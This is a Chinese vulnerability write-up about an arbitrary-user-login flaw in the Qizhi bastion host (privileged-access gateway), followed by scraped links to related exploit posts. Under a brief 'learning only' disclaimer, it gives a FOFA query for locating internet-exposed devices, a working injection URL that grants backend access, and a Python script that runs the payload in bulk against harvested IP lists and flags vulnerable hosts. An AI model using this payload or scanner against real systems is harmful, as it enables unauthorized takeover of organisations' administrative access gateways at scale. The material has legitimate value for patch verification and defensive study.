齐治堡垒机任意用户登录漏洞
声明:仅供漏洞检测和学习,勿用于非法测试
漏洞信息
浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞,访问特定的Url即可获得后台权限。漏洞情报泄露时间:2021-04-10 23:03:05
fofa查询语法
app=“齐治科技-堡垒机”
POC
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
批量检测脚本
可以先用fofa批量获取ip -》批量爬取fofa查询的目标ip地址
from requests.packages import urllib3
urllib3.disable_warnings()
import requests
from colorama import init
init(autoreset=True)
headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',}for url in open("./app=齐治科技-堡垒机.txt",'r'):#读取出来的数据默认加了换行符,这里要去掉url = url.strip("\n")vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"try:re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'})if "您尚未登录或者您的会话已超时,请 重新登录系统" in re.text:print(f"{url}漏洞不存在")elif "错误的id" in re.text:print(f"\033[0;32m{vu_url}漏洞存在\033[0m")except:print(f"{url}无响应")
print('ok')
齐治堡垒机任意用户登录漏洞相关推荐
- H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞 1.H3C SecParh堡垒机任意用户登录漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构 ...
- 齐治堡垒机配置文件服务器,登录齐治堡垒机简易使用手册V
应用公布手册配置管理员杭州奇智信息科技 20XX年3月 版本 目录 第1章 用户登录shterm. . . . . . . . . . . . . . . . . . . . . . . . . ...
- mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce
1.绿盟UTS绕过登录 随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录 直接请求接口:/webapi/v1/syst ...
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
一.基本信息 参考:https://www.cnvd.org.cn/flaw/show/1559039 补丁信息:该漏洞的修复补丁已于2019年4月1日发布.如果客户尚未修复该补丁,可联系齐治科技的技 ...
- mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明
尊敬的用户: 齐治科技(下述简称"齐治")注意到近期有消息称"齐治堡垒机存在未修复的前台远程代码执行漏洞".经过确认,消息提及的漏洞是齐治已停售产品Shterm ...
- 安恒堡垒机使用手册_齐治堡垒机简易使用手册
================ 精选公文范文, 管理类, 工作总结类, 工作计划类文档, 欢迎阅读下载 ============== -------------------- 精选公文范文,管理类, ...
- 齐治堡垒机配置文件服务器,齐治堡垒机操作手册-20210703081118.docx-原创力文档
Copyright ? 2009-2011 Copyright ? 2009-2011 齐治科技Page PAGE # 齐治堡垒机操作手册 中国旅游集团 信息共享中心 2020年2月 版本 TOC \ ...
- 浪潮ClusterEngineV4.0 任意用户登录漏洞
文章目录 漏洞名称 漏洞描述 影响版本 fofa 漏洞复现 第一步 登录页面 第二步 成功登录后台 摘抄 漏洞名称 浪潮ClusterEngineV4.0 存在任意用户登录漏洞, 漏洞描述 浪潮Clu ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
最新文章
- 用matlab判断文件是否存在_判断文件夹、文件是否存在、创建文件 c++ matlab
- [转]cocos2d游戏开发,常用工具集合
- Jquery 关于span标签的取值赋值用法
- 《第一行代码》学习笔记11-活动Activity(9)
- java json float_java – Json解析问题(值自动更改为float)
- 超过父控件的部分不能响应事件怎么办
- 【算法与数据结构】——并查集
- 20210706_IEEEDataPort免费订阅
- HDFS数据加密空间--Encryption zone
- 金山和微软word脚注和尾注问题
- 从win10回退到win7的苦逼经历
- C++第三次实验:税收计算
- spring-定时任务
- 计算机类学生考试系统,学生在线考试系统.doc
- 7723java世界Ol,你不知道的《世界OL》
- java去掉date分时秒_java Date获取年月日时分秒的实现方法
- 一个简单的小游戏——“数字炸弹”的实现
- Mac系统 Terminal终端功能使用方法
- Python手写汉字(中文)识别~单字/多字推荐模式
- 饿了么开放平台接入(2)——使用Java对接店铺
热门文章
- 在计算机网络的工作模式中,在计算机网络的工作模式中,网络中计算机角色既是客户机又是服务器,及提供服务又使用服务,这种模式成为( )...
- Sorting Pancakes(dp)
- 研究 | 健康大数据平台的“区块链治理”
- 数据结构课设+校园导航系统
- 在一圆周上任意取三个点构成锐角三角形的概率是多少?
- 分布式事务解决方案之RabbitMQ
- 2023最新Mac电脑必备推荐下载 缺一不可|新手Mac软件下载
- 快速部署Melodic开发环境
- C#地理信息编辑器GIS编辑方案, Winform GIS编辑器,C#地理信息编辑器,.NET地理信息编辑器...
- H5页面点击调起腾讯/百度/高德地图APP